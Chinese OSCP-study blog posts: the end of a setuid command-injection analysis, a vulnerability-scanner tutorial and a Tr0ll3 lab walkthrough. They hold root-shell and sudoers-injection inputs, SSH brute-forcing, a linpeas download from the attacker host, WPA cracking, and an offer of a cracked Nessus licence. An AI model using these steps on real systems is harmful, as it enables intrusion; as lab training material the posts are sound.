- 无过滤的用户输入直接用于格式化字符串
- 可能触发内存泄露或任意写入
路径依赖问题
- 硬编码使用/bin/echo而非/usr/bin/echo
- 环境变量PATH可被劫持

🛠️ 实际攻击场景演示

场景1：命令注入获取root shell

1$ ./msg2root
2Message for root:; /bin/sh; # 
3
4# 实际执行命令
5/bin/echo ; /bin/sh; # >> /root/messages.txt

注入命令/bin/sh启动shell
#后的内容被注释，避免语法错误
新shell继承程序的root权限

场景2：写入敏感文件

1$ ./msg2root
2Message for root:; echo "kane ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers; #
3
4# 实际效果
5为kane添加无密码sudo权限

🚫 安全漏洞修复建议

修复后代码

 1#include <stdio.h>
 2#include <stdlib.h>
 3#include <unistd.h>
 4
 5int main() {
 6 printf("Message for root:");
 7 
 8 // 安全的输入读取
 9 char input[256];
10 if (!fgets(input, sizeof(input), stdin)) {
11 exit(1);
12 }
13 
14 // 移除换行符防止注入
15 for (char *p = input; *p; p++) {
16 if (*p == '\n') *p = '\0';
17 }
18 
19 // 严格验证输入
20 for (char *c = input; *c; c++) {
21 if (*c == ';' || *c == '|' || *c == '&') {
22 fprintf(stderr, "Illegal character: %c\n", *c);
23 exit(1);
24 }
25 }
26 
27 // 使用文件IO代替系统命令
28 FILE *fp = fopen("/root/messages.txt", "a");
29 if (fp) {
30 fprintf(fp, "%s\n", input);
31 fclose(fp);
32 }
33 return 0;
34}

关键修复措施

移除命令注入风险
- 禁用system()
- 使用文件IO直接写入

输入过滤

1// 禁止危险字符
2if (strchr(input, ';') || strchr(input, '|') || ...)

权限最小化

1// 执行前放弃root权限
2setuid(getuid());

日志审计
- 记录所有操作

📁 文件权限关键点

程序必须具有SetUID权限且属于root

1ls -l msg2root
2-rwsr-xr-x 1 root root 16784 Jul 24 10:23 msg2root

/root/messages.txt需要：

1chown root:root /root/messages.txt
2chmod 644 /root/messages.txt

🔔 想要获取更多网络安全与编程技术干货？

关注 泷羽Sec-静安 公众号，与你一起探索前沿技术，分享实用的学习资源与工具。我们专注于深入分析，拒绝浮躁，只做最实用的技术分享！💻

扫描下方二维码，马上加入我们，共同成长！🌟

👉 长按或扫描二维码关注公众号

或者直接回复文章中的关键词，获取更多技术资料与书单推荐！📚

Day22 Kali漏洞扫描

Fri, 25 Jul 2025 23:45:31 +0000

关注泷羽Sec和泷羽Sec-静安公众号，这里会定期更新与 OSCP、渗透测试等相关的最新文章，帮助你理解网络安全领域的最新动态。后台回复“OSCP配套工具”获取本文的工具

对应OSCP官方教材第八章。

漏洞扫描：安全评估的自动化基石

漏洞扫描（简称“漏扫”），作为网络安全领域不可或缺的核心技术手段，贯穿于安全评估的始终。其本质是通过集成海量漏洞验证脚本（POC）与利用脚本（EXP），向目标系统发送特定探测请求，并根据返回响应特征自动化识别潜在安全弱点的过程。

核心价值与定位：

效率引擎： 面对海量资产（如数十甚至上百个站点、服务器），手工检测效率低下且难以覆盖。漏扫工具凭借其自动化、批量化的特性，成为快速发现大面积、已知漏洞的首选武器，是安全审计流程中至关重要的第一步。
风险探照灯： 在复杂的网络环境中，“你永远不知道漏洞扫描会发生什么”。它是主动暴露未知风险、预防潜在攻击的有效途径。
技术与场景融合： 技术本身无高下之分，“黑猫白猫，抓到老鼠就是好猫”。自动化漏扫与精细化手工测试并非对立，而是互补。最佳实践是：先利用漏扫进行广覆盖、批量化的初步筛查，再对高风险目标或复杂逻辑进行深度手工验证，形成“广撒网+深挖潜”的高效组合拳。

工作原理与流程： 一个典型的漏洞扫描流程包含以下关键步骤：

主机发现： 识别网络中存活的目标设备。
端口扫描： 探测目标设备开放的网络端口。
指纹识别： 基于服务响应（如Banner、协议行为、文件特征）判断操作系统、应用、服务及其版本（需注意版本伪装现象，如某些Tomcat版本统一返回相同头部）。
服务与行为分析： 深入探测服务细节、暴露的文件、目录等。
漏洞特征匹配/利用验证： 运用庞大的POC/EXP库进行探测。部分高级扫描会进行试探性攻击以降低误报（但需谨慎评估风险）。

漏洞扫描核心总结

1. 手动扫描与自动扫描的辩证关系

维度	手动扫描	自动扫描
优势	精准发现逻辑漏洞；绕过防护机制；隐蔽性高（适合红队）；对目标干扰小	快速覆盖大规模目标；建立安全基准；标准化漏洞验证（如CVE匹配）
劣势	效率极低（难以处理大型目标）；高度依赖经验；易遗漏重复性漏洞	高误报/漏报率；难以发现复杂业务逻辑漏洞；攻击特征明显易触发告警
适用场景	关键系统深度测试、红队隐蔽渗透、漏洞二次验证	初筛阶段、合规性检查、周期性安全巡检

结论: 二者非对立关系，应遵循 “先自动化广覆盖，后手工精准打击” 的策略。渗透测试的核心价值在于 超越工具的人工分析能力。

2. 互联网扫描 vs. 内网扫描的关键差异

影响因素	互联网扫描	内网扫描
网络条件	带宽受限、高延迟、跳数多；防火墙/IPS严格过滤	高带宽、低延迟；内网设备可能老旧易崩溃
可见性	仅暴露面服务（ICMP/ARP常被阻断）	全端口可见（可ARP发现主机）
扫描策略	低速扫描（防触发警报）；优先非破坏性POC	可高速扫描；支持侵入式检测（需评估设备耐受性）

操作要点:

速度控制：初始使用低速率扫描，验证结果质量后逐步提速。
发现机制：互联网目标需使用TCP SYN等替代ICMP/ARP。
风险评估：内网扫描警惕对老旧设备的DoS风险。

3. 认证扫描 vs. 非认证扫描的深度对比

层面	认证扫描	非认证扫描
原理	凭据登录系统（SSH/WMI），访问内部资源	纯网络发包探测，无系统权限
检测深度	补丁状态、注册表、配置文件、敏感文件（如Program Files）	仅开放服务漏洞、Banner版本、弱口令等表层风险
准确性	误报率极低（直接验证漏洞存在性）	误报率高（依赖版本特征猜测）
配置挑战	Linux需SSH；Windows需破解UAC/WMI防火墙限制	开箱即用，无配置依赖

适用场景:

认证扫描：合规审计（如PCI DSS）、系统上线前深度检查。
非认证扫描：外部攻击面评估、应急响应快速筛查。

注意: Windows环境需解决UAC限制，否则认证扫描可能失败。

本章导读： 本章将深入剖析漏洞扫描的技术原理、核心工作流程、主流工具（如Nessus, AWVS, Nmap, GVM等）的应用模式（重点探讨认证与非认证扫描的实施细节与场景选择），分析其优势与局限性（精度问题、版本识别挑战），并探讨如何有效评估扫描结果、管理误报/漏报，以及如何将自动化扫描与手工测试有机结合，构建高效、全面的安全评估体系。理解漏洞扫描的本质和最佳实践，是每一位安全从业者夯实基础、提升效率的关键一步。

🛠️ Nessus安装和使用

官网下载链接：https://www.tenable.com/downloads/nessus?loginAttempted=true

# 1. 更新系统
sudo apt update && sudo apt upgrade -y

# 2. 下载Nessus .deb包（官网获取最新URL）
wget https://www.tenable.com/downloads/api/v2/pages/nessus/files/<最新版本>.deb

# 3. 校验文件完整性（需与官网SHA256匹配）
sha256sum Nessus-*.deb

# 4. 安装
sudo dpkg -i Nessus-*.deb

# 5. 启动服务
sudo systemctl start nessusd

# 6. 访问控制台
https://localhost:8834

后续配置：

选择 Nessus Essentials → 填写邮箱获取激活码 → 创建本地管理员账户
首次初始化需1小时+（自动下载13万+插件库）

扫描核心操作流程

1. 新建扫描

扫描类型	适用场景	关键配置
基本网络扫描	常规漏洞探测	默认设置（仅扫公共端口）
认证补丁审核	内网深度检测	需填SSH/Windows凭据
高级扫描	自定义漏洞检测	可禁用插件/指定端口

2. 目标配置

格式：IP/IP段/域名（例：10.11.1.73）

端口控制：

路径：设置 → 发现 → 端口扫描
修改 "Port Scan Range"：0-65535（全端口）或指定端口（如111）

3. 认证扫描配置

路径：凭据 → SSH
→ 认证方法：Password
→ 用户名：root
→ 密码：[目标密码]

4. 单插件扫描

路径：插件 → 点击"全部禁用"
→ 展开分类（如RPC）→ 启用特定插件（如"NFS Exported Share Information Disclosure"）

5. 结果分析

过滤高危漏洞：点击"过滤器" → 可被利用 = true
关闭分组视图：右上角齿轮 → 禁用分组
导出报告：支持PDF/CSV/HTML格式

操作避坑指南

资源警告：全端口扫描需8GB+内存，避免扫描期间运行其他重负载任务
账户锁定：在配置中关闭 “Brute Force” 选项（路径：扫描策略 → 高级）
Windows认证失败：确认目标开启WMI服务且防火墙放行135/445端口
插件更新：定期执行 sudo /opt/nessus/sbin/nessuscli update
破解：默认只能扫16个IP，破解请关注公众号回复本文开头的关键字获取。

🔍 Nmap漏洞扫描深度解析

核心机制： Nmap通过NSE脚本引擎（Nmap Scripting Engine）实现漏洞扫描，700+个Lua脚本分为两类：

vuln类：漏洞检测（如http-vuln-cve2017-5638）
exploit类：精简漏洞利用（如smb-vuln-cve-2017-7494）

⚠️ 安全风险分级（执行前必看）：

级别	特征	典型脚本
`safe`	仅信息收集	`http-title.nse`
`intrusive`	可能崩溃服务	`http-slowloris.nse`

🖥️ 关键操作命令：

# 查看所有漏洞扫描脚本
ls /usr/share/nmap/scripts | grep vuln

# 检查脚本功能（强烈建议使用AI解析）
nmap --script-help <脚本名> # 例如：nmap --script-help http-vuln*

# 安全扫描（仅用safe类）
nmap -sV --script "safe and vuln" <目标IP>

# 漏洞探测（vuln类脚本）
nmap -sV --script=vuln <目标IP>

# 精确调用指定脚本
nmap -sV --script=http-vuln-cve2021-41773 <目标IP>

# 扫描结果保存
nmap -sV -oX report.xml --script=vuln <目标IP>

⚙️ 脚本管理技巧：

# 查看脚本分类（script.db数据库）
grep 'categories' /usr/share/nmap/scripts/script.db

# 过滤高风险脚本（排除intrusive）
nmap --script "vuln and not intrusive" <目标IP>

# 更新NSE脚本库
sudo nmap --script-updatedb

📌 最佳实践：

未知脚本必查：nmap --script-help <脚本名> 或丢给AI解读

生产环境先用 --script-trace 预览探测行为

高危操作前在测试环境验证

🛡️ GVM（Greenbone漏洞管理器）部署指南

原为OpenVAS，是Nessus的开源分支，提供企业级漏洞管理能力。

⚡ 快速部署命令（Kali Linux）：

# 安装组件
sudo apt update && sudo apt install -y gvm*

# 初始配置（约15分钟，需联网）
sudo gvm-setup # 自动生成管理员账户

# 更新漏洞数据库（首次需20GB磁盘空间）
sudo gvm-feed-update

# 启动服务
sudo gvm-start # Web控制台：https://127.0.0.1:9392

# 验证安装
sudo gvm-check-setup # 显示各组件状态

🖥️ 常用操作：

# 启动/停止服务
sudo gvm-start | sudo gvm-stop

# 重置管理员密码
sudo runuser -u _gvm -- gvmd --user=admin --new-password=<新密码>

# 手动更新数据库（每日执行）
sudo crontab -e # 添加：0 0 * * * sudo gvm-feed-update

🌐 基础使用流程：

访问 https://localhost:9392 → 用 admin 和安装时生成的密码登录
创建扫描任务：
- 目标配置：指定IP/域名范围
- 扫描策略：选择 Full and fast（平衡模式）
- 认证设置：添加SSH/Windows凭证提升扫描深度
导出报告：支持PDF/CSV/XML格式

💡 高级技巧：

联动Nmap：将 nmap -oX 生成的XML报告导入GVM分析

定制策略：禁用暴力破解选项防账户锁定

计划任务：设置每周全盘扫描 + 每日增量扫描

🔍 AWVS 安装使用

Acunetix Web Vulnerability Scanner (AWVS) 是全球顶尖的 Web 应用漏洞扫描器，专注于自动化检测网站与 API 的安全漏洞。

🔑 核心特性：

类别	能力
扫描范围	SQL 注入、XSS、SSRF、JWT 漏洞、敏感信息泄露等 13000+ 漏洞
技术深度	支持现代 Web 技术（SPA、WebSocket、GraphQL 等）
部署模式	支持本地安装（Windows/Linux）和云平台（Acunetix Online）
合规性	满足 PCI DSS、HIPAA、ISO 27001 等安全标准

📌 定位：与传统网络扫描器（Nessus）互补，专精 Web 层漏洞挖掘。

📥 安装指南（Kali Linux）

⚠️ 前提条件：

硬件：≥4 核 CPU / 8GB RAM / 20GB 磁盘空间
系统：Kali Linux 2023+（或 Ubuntu/Debian）
授权：需官网获取 14 天试用密钥（或购买商业许可）

🛠️ 安装步骤：

# 1. 下载安装包（需注册官网获取下载链接）
wget https://dl.acunetix.com/acu/24.3/acuinstall.sh

# 2. 赋予执行权限
chmod +x acuinstall.sh

# 3. 安装依赖
sudo apt install -y libxcb-xinerama0 libxkbcommon-x11-0

# 4. 启动安装（默认端口：13443）
sudo ./acuinstall.sh --install-license YOUR_LICENSE_KEY

# 5. 访问控制台
https://localhost:13443

💡 重要提示：首次登录需设置管理员邮箱与密码（保存至 /var/lib/acunetix/.config）

🚀 基础使用教程

1. 创建扫描任务

目标配置
- 输入 URL（如 https://example.com）
- 启用 深度爬虫（识别 SPA 动态内容）
- 设置 认证登录（支持 Cookie/表单/OAuth）

扫描策略

模式	特点
快速扫描	耗时短，仅查高危漏洞
全扫描	覆盖所有漏洞检测模块（推荐）
自定义扫描	手动选择检测项（如仅查 API）

2. 扫描结果分析

漏洞分级： 🔴 高危（SQLi、RCE）→ 🟠 中危（XSS）→ 🟢 低危（信息泄露）
利用验证：支持 POC 重放（验证漏洞真实性）
报告导出：支持 PDF/HTML/XML（含修复建议）

3. 高级功能

API 扫描：导入 Swagger/Postman 文件
敏感数据监控：实时检测 Git 泄露、密钥硬编码
CI/CD 集成：Jenkins/GitLab 插件自动化扫描

⚠️ 避坑指南

问题	解决方案
扫描崩溃	限制并发请求（`Settings → Scan Settings → Max Requests`）
误报率高	启用 `Proof-Based Scanning` 二次验证
登录失效	使用 `AcuSensor` 代理抓取认证流量
社区版限制	避开「Acunetix 360 Free」，仅支持 3 页面扫描

相似功能新产品推荐

Nessus和AWVS作为入门熟悉的工具可用，但是再实际测试过程中误报和漏扫率高。安全技术更新换代快，以下是我个人对这些产品的经验看法，和推荐目前比较好用的几个工具。

⚖️ 商业 vs 开源核心差异分析

首先，这些产品分为商业版和开源版，两者的区别有：

🏭 商业工具依赖维度

graph TB
A[商业产品] --> B(专属漏洞实验室)
A --> C(0day快速响应)
A --> D(自动化合规报告)
A --> E(私有漏洞情报)
F[公司经营风险] --> G[产品更新放缓]
F --> H[漏洞库滞后]
F --> I[误报率上升]

🌐 开源工具生存逻辑

graph TB
J[开源项目] --> K(社区贡献者)
J --> L(GitHub Star驱动)
J --> M(企业赞助)
N[技术门槛] --> O[需自行维护规则库]
N --> P[适配定制化环境]
N --> Q[漏洞验证脚本开发]

📊 关键能力对比

能力维度	商业工具	开源工具
漏洞响应速度	0day通常<24小时	依赖社区更新（平均3-7天）
合规支持	自动生成符合审计的报告	需手动整理
使用成本	年费5000−50000+	免费但需时间成本
定制灵活性	闭源不可修改	可二次开发

🛡️ 中国网络安全市场主流产品图谱

产品名称	厂商	主打能力	行业占有率
奇安信网神漏洞扫描系统	奇安信	等保2.0合规驱动 · 信创生态适配（麒麟/统信） · 0day响应<12小时	政府/央企（≥35%）
安恒明鉴漏洞扫描器	安恒信息	Web3.0深度检测 · API安全治理 · 结合「北斗」AI引擎	金融/医疗（28%）
绿盟极光漏洞扫描系统	绿盟科技	攻防演练模式 · ICS/OT工控支持 · 漏洞利用链可视化	能源/制造业（20%）
长亭洞鉴	长亭	动态流量分析 · RASP结合 · 云原生漏洞挖掘	互联网/云平台（18%）
启明星辰天镜	启明星辰	资产管理优先 · 漏洞生命周期管理 · 等保测评报告自动生成	教育/运营商（15%）

🆚 国产 VS 国际产品关键差异

维度	国内产品优势	国际产品劣势
合规支持	内置等保2.0/关基条例模板	需定制开发
漏洞响应	CNNVD/CNVD同步<6小时	CVE中心依赖（时差延迟）
信创适配	深度支持国产OS/数据库	仅兼容Windows/Linux主流版
定价策略	按IP/年收费（含驻场服务）	订阅制（美元结算+高溢价）

🚀 免费替代方案推荐

XRay 社区版（长亭开源）

# 被动代理扫描
./xray webscan --listen 127.0.0.1:7777

Goby 社区版
- 资产测绘免费 · 漏洞扫描限量
Yakit+Nuclei
- Yakit是集成化单兵安全能力平台，用Yaklang语言编写
- Nuclei有丰富的开源模板，也可以自行编写漏洞模板，或让AI编写
- Yakit支持直接导入Nuclei模板扫描

🔔 想要获取更多网络安全与编程技术干货？

关注 泷羽Sec-静安 公众号，与你一起探索前沿技术，分享实用的学习资源与工具。我们专注于深入分析，拒绝浮躁，只做最实用的技术分享！💻

扫描下方二维码，马上加入我们，共同成长！🌟

👉 长按或扫描二维码关注公众号

或者直接回复文章中的关键词，获取更多技术资料与书单推荐！📚

Day20 Tr0ll3 靶场WP

Thu, 24 Jul 2025 23:45:31 +0000

关注泷羽Sec和泷羽Sec-静安公众号，这里会定期更新与 OSCP、渗透测试等相关的最新文章，帮助你理解网络安全领域的最新动态。后台回复“OSCP配套工具”获取本文的工具

链接地址下载虚拟镜像：

https://www.vulnhub.com/entry/tr0ll-3,340/

信息收集

1# 靶机地址
2172.168.169.142
3# Kali攻击机地址
4172.168.169.141

扫描端口

1ports=$(sudo nmap -p- --min-rate=10000 -Pn 172.168.169.142 | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
2echo $ports
3sudo nmap -sT -sC -sV -O -Pn -p$ports 172.168.169.142
4sudo nmap --script=vuln -p$ports -Pn 172.168.169.142

扫描结果如下：

 1┌──(kali㉿kali)-[~/Desktop/Potato]
 2└─$ ports=$(sudo nmap -p- --min-rate=5000 -Pn 172.168.169.142 | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
 3
 4┌──(kali㉿kali)-[~/Desktop/Potato]
 5└─$ echo $ports
 622
 7
 8┌──(kali㉿kali)-[~/Desktop/Potato]
 9└─$ sudo nmap -sT -sC -sV -O -Pn -p$ports 172.168.169.142
10Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-23 02:25 EDT
11Nmap scan report for 172.168.169.142
12Host is up (0.0018s latency).
13
14PORT STATE SERVICE VERSION
1522/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
16| ssh-hostkey:
17| 2048 6d:d1:ea:d0:a8:1e:83:ef:c7:4f:ae:4c:bb:d6:75:19 (RSA)
18| 256 24:5f:cb:ef:3a:db:b5:59:c6:15:51:b9:2b:9b:fa:39 (ECDSA)
19|_ 256 8b:96:de:4a:11:45:a7:f9:eb:60:9b:45:da:1a:21:de (ED25519)
20MAC Address: 00:0C:29:9A:2A:57 (VMware)
21Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
22Device type: general purpose
23Running: Linux 3.X|4.X
24OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
25OS details: Linux 3.2 - 4.14
26Network Distance: 1 hop
27Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
28
29OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
30Nmap done: 1 IP address (1 host up) scanned in 3.96 seconds
31
32┌──(kali㉿kali)-[~/Desktop/Potato]
33└─$ sudo nmap --script=vuln -p$ports -Pn 172.168.169.142
34Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-23 02:25 EDT
35Nmap scan report for 172.168.169.142
36Host is up (0.0012s latency).
37
38PORT STATE SERVICE
3922/tcp open ssh
40MAC Address: 00:0C:29:9A:2A:57 (VMware)
41
42Nmap done: 1 IP address (1 host up) scanned in 10.87 seconds

扫描端口发现只有一个22端口打开，其他都关闭。一开始以为是靶机没开起来，回到虚拟机开机界面发现初始页面直接显示了登录用户名和密码，可以直接登录。也可以用hydra进行爆破，因为一开始Nmap扫描出来提示的SSH版本比较低。

1hydra -L top-usernames-shortlist.txt -P password.txt ssh://172.168.169.142

内网信息收集

内核信息收集

 1uname -a
 2lsb_release -a
 3---
 4start@Tr0ll3:~$ lsb_release -a
 5No LSB modules are available.
 6Distributor ID: Ubuntu
 7Description: Ubuntu 18.04.2 LTS
 8Release: 18.04
 9Codename: bionic
10start@Tr0ll3:~$ uname -a
11Linux Tr0ll3 4.15.0-55-generic #60-Ubuntu SMP Tue Jul 2 18:22:20 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux

用不了sudo

1start@Tr0ll3:~$ sudo -l
2[sudo] password for start:
3Sorry, user start may not run sudo on Tr0ll3.

找到文件夹下两个文件里给的提示

1start@Tr0ll3:~/bluepill$ cat awesome_work
2http://bfy.tw/ODa
3start@Tr0ll3:~/bluepill$ cat ../redpill/this_will_surely_work
4step2:Password1!

在home文件夹下找到其他用户，尝试进入step2用户文件夹，没有权限，密码也不是step2:Password1!。这个网址也是打不开的。

 1start@Tr0ll3:/home$ ls -al
 2total 40
 3drwxr-xr-x 10 root root 4096 Jun 19 2015 .
 4drwxr-xr-x 27 root root 4096 Aug 1 2019 ..
 5drwx------ 2 genphlux genphlux 4096 Jun 18 2015 appserver
 6drwx------ 4 eagle russ 4096 Aug 2 2019 eagle
 7drwx------ 2 fido fido 4096 Jun 18 2015 fido
 8drwx------ 4 genphlux genphlux 4096 Aug 2 2019 genphlux
 9drwx------ 5 maleus maleus 4096 Aug 2 2019 maleus
10drwx------ 7 start start 4096 Aug 2 2019 start
11drwx------ 2 step2 step2 4096 Jun 18 2015 step2
12drwx------ 4 wytshadow wytshadow 4096 Aug 2 2019 wytshadow
13start@Tr0ll3:/home$ cd step2
14-bash: cd: step2: Permission denied
15start@Tr0ll3:/home$ su step2
16Password:
17su: Authentication failure

查看/etc/passwd文件，没有发现可以爆破的hash。

 1start@Tr0ll3:/home$ cat /etc/passwd
 2root:x:0:0:root:/root:/bin/bash
 3daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
 4bin:x:2:2:bin:/bin:/usr/sbin/nologin
 5sys:x:3:3:sys:/dev:/usr/sbin/nologin
 6sync:x:4:65534:sync:/bin:/bin/sync
 7games:x:5:60:games:/usr/games:/usr/sbin/nologin
 8man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
 9lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
10mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
11news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
12uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
13proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
14www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
15backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
16list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
17irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
18gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
19nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
20syslog:x:101:104::/home/syslog:/bin/false
21messagebus:x:102:106::/var/run/dbus:/bin/false
22landscape:x:103:109::/var/lib/landscape:/bin/false
23sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
24maleus:x:1000:1000:maleus,,,:/home/maleus:/bin/bash
25start:x:1001:1001:,,,:/home/start:/bin/bash
26ftp:x:105:112:ftp daemon,,,:/srv/ftp:/bin/false
27wytshadow:x:1003:1003:,,,:/home/wytshadow:/bin/bash
28genphlux:x:1004:1004:,,,:/home/genphlux:/bin/bash
29statd:x:106:65534::/var/lib/nfs:/bin/false
30fido:x:1005:1006:,,,:/home/fido:/bin/bash
31step2:x:1006:1007:,,,:/home/step2:/bin/bash
32eagle:x:1002:1002:,,,:/home/eagle:/bin/bash
33systemd-timesync:x:107:115:systemd Time Synchronization,,,:/run/systemd:/bin/false
34systemd-network:x:108:116:systemd Network Management,,,:/run/systemd/netif:/bin/false
35systemd-resolve:x:109:117:systemd Resolver,,,:/run/systemd/resolve:/bin/false
36uuidd:x:100:101::/run/uuidd:/bin/false
37_apt:x:111:65534::/nonexistent:/bin/false

上小豌豆一把梭，发现pkexec可以提权，但是因为没有sudo所以也用不了；可用命令中有gcc，所以下一步尝试一下能不能用内核提权漏洞直接gcc编译一下提权，但是靶机的Ubuntu版本太高了，可能提权不了。

 1 wget http://172.168.169.141:8000/linpeas.sh
 2 chmod +x linpeas.sh
 3 ---
 4
 5Linux version 4.15.0-55-generic (buildd@lcy01-amd64-029) (gcc version 7.4.0 (Ubuntu 7.4.0-1ubuntu1~18.04.1)) #60-Ubuntu SMP Tue Jul 2 18:22:20 UTC 2019
 6Distributor ID: Ubuntu
 7Description: Ubuntu 18.04.2 LTS
 8Release: 18.04
 9Codename: bionic
10
11╔══════════╣ Sudo version
12╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#sudo-version
13Sudo version 1.8.21p2
14
15══╣ Polkit Binary
16Pkexec binary found at: /usr/bin/pkexec
17Pkexec binary has SUID bit set!
18-rwsr-xr-x 1 root root 22520 Mar 27 2019 /usr/bin/pkexec
19pkexec version 0.105
20
21╔══════════╣ Useful software
22/usr/bin/base64
23/usr/bin/gcc
24/usr/bin/gdb
25/bin/nc
26/bin/netcat
27/usr/bin/perl
28/bin/ping
29/usr/bin/python
30/usr/bin/python2
31/usr/bin/python2.7
32/usr/bin/python3
33/usr/bin/python3.6
34/usr/bin/sudo
35/usr/bin/wget

翻一下主目录，发现两个不同于一般主目录的文件，lol和hints

lol目录提示需要权限。然后翻找/.hints目录发现，下面有很多套娃的文件夹，直到翻到最后一个发现一个txt文件，打开似乎是密码或者加密的密钥。

1ls /.hints/lol/rofl/roflmao/this/isnt/gonna/stop/anytime/soon/still/going/lol/annoyed/almost/there/jk/no/seriously/last/one/rofl/ok/ill/stop/however/this/is/fun/ok/here/rofl/sorry/you/made/it/
2cat /.hints/lol/rofl/roflmao/this/isnt/gonna/stop/anytime/soon/still/going/lol/annoyed/almost/there/jk/no/seriously/last/one/rofl/ok/ill/stop/however/this/is/fun/ok/here/rofl/sorry/you/made/it/gold_star.txt

文件路径的英文翻译过来是一句嘲讽，不得不说Tr0ll系列的作者Maleus真的很欠扁，而且也不只我一个人这么觉得。

回到靶机，查看这个文件的权限发现是0777的，所以我们再广泛的搜索一下还有这样类似的文件。

1find / -type f -perm 0777 2>/dev/null 
2---
3start@Tr0ll3:/tmp$ find / -type f -perm 0777 2>/dev/null
4/var/log/.dist-manage/wytshadow.cap
5/.hints/lol/rofl/roflmao/this/isnt/gonna/stop/anytime/soon/still/going/lol/annoyed/almost/there/jk/no/seriously/last/one/rofl/ok/ill/stop/however/this/is/fun/ok/here/rofl/sorry/you/made/it/gold_star.txt

流量包密码破解

cap明显是一个流量包文件，下载这两个文件到kali中再分析。

1scp start@172.168.169.142:/.hints/lol/rofl/roflmao/this/isnt/gonna/stop/anytime/soon/still/going/lol/annoyed/almost/there/jk/no/seriously/last/one/rofl/ok/ill/stop/however/this/is/fun/ok/here/rofl/sorry/you/made/it/gold_star.txt gold_star.txt
2scp start@172.168.169.142:/var/log/.dist-manage/wytshadow.cap wytshadow.cap

查看流量包文件，发现开头就是一个叫wytshadow的用户登录的会话，用的是TpLink，这个很明显是WIFI无线网，使用无线网工具尝试爆破。

用默认的自带的字典爆破不成功，这是想到刚刚从那个欠扁的目录下载的gold_star.txt 是不是就是密码字典。

1tshark -r wytshadow.cap
2sudo apt install aircrack-ng
3aircrack-ng -w /usr/share/wordlists/fasttrack.txt wytshadow.cap
4aircrack-ng -w gold_star.txt wytshadow.cap

大概要爆破半小时。

开启Nginx服务

破解得到用户密码wytshadow:gaUoCe34t1

 1start@Tr0ll3:~$ su wytshadow
 2Password:
 3wytshadow@Tr0ll3:/home/start$ cd
 4wytshadow@Tr0ll3:~$ ls
 5oohfun
 6wytshadow@Tr0ll3:~$ ls -al
 7total 40
 8drwx------ 4 wytshadow wytshadow 4096 Aug 2 2019 .
 9drwxr-xr-x 10 root root 4096 Jun 19 2015 ..
10-rw-r--r-- 1 wytshadow wytshadow 220 Jun 17 2015 .bash_logout
11-rw-r--r-- 1 wytshadow wytshadow 3637 Jun 17 2015 .bashrc
12drwx------ 2 wytshadow wytshadow 4096 Jun 17 2015 .cache
13drwx------ 3 wytshadow wytshadow 4096 Aug 1 2019 .gnupg
14-rwsrwxrwx 1 genphlux root 8566 Jun 17 2015 oohfun
15-rw-r--r-- 1 wytshadow wytshadow 675 Jun 17 2015 .profile

执行oohfun发现提示一堆信息，暂时关闭。看一下sudo -l发现可以执行nginx服务，之前扫描这个靶机发现只有22端口，所以开80端口的任务原来是wytshadow用户完成。

 1sudo /usr/sbin/service nginx start
 2netstat -tunlpa
 3---
 4wytshadow@Tr0ll3:/tmp$ netstat -tunlpa
 5(No info could be read for "-p": geteuid()=1003 but you should be root.)
 6Active Internet connections (servers and established)
 7Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
 8tcp 0 0 0.0.0.0:8080 0.0.0.0:* LISTEN -
 9tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
10tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
11tcp 0 36 172.168.169.142:22 172.168.169.141:56950 ESTABLISHED -
12tcp6 0 0 
138080 
14* LISTEN -
15tcp6 0 0 
1622 
17* LISTEN -
18udp 0 0 127.0.0.53:53 0.0.0.0:* -
19udp 0 0 0.0.0.0:68 0.0.0.0:* -

查看nginx相关配置，最终找到配置文件，发现服务开启再8080端口上，限制user agent为"Lynx"。

 1# 查看nginx相关配置
 2wytshadow@Tr0ll3:/tmp$ find / -name nginx > find.txt
 3wytshadow@Tr0ll3:/tmp$ cat find.txt
 4/var/lib/nginx
 5/var/log/nginx
 6/var/nginx
 7/etc/init.d/nginx
 8/etc/logrotate.d/nginx
 9/etc/default/nginx
10/etc/nginx
11/etc/ufw/applications.d/nginx
12/usr/sbin/nginx
13/usr/lib/nginx
14/usr/share/nginx
15/usr/share/doc/nginx
16wytshadow@Tr0ll3:/tmp$ cat /etc/nginx/sites-available/default
17##
18# You should look at the following URL's in order to grasp a solid understanding
19# of Nginx configuration files in order to fully unleash the power of Nginx.
20# https://www.nginx.com/resources/wiki/start/
21# https://www.nginx.com/resources/wiki/start/topics/tutorials/config_pitfalls/
22# https://wiki.debian.org/Nginx/DirectoryStructure
23#
24# In most cases, administrators will remove this file from sites-enabled/ and
25# leave it as reference inside of sites-available where it will continue to be
26# updated by the nginx packaging team.
27#
28# This file will automatically load configuration files provided by other
29# applications, such as Drupal or Wordpress. These applications will be made
30# available underneath a path with that package name, such as /drupal8.
31#
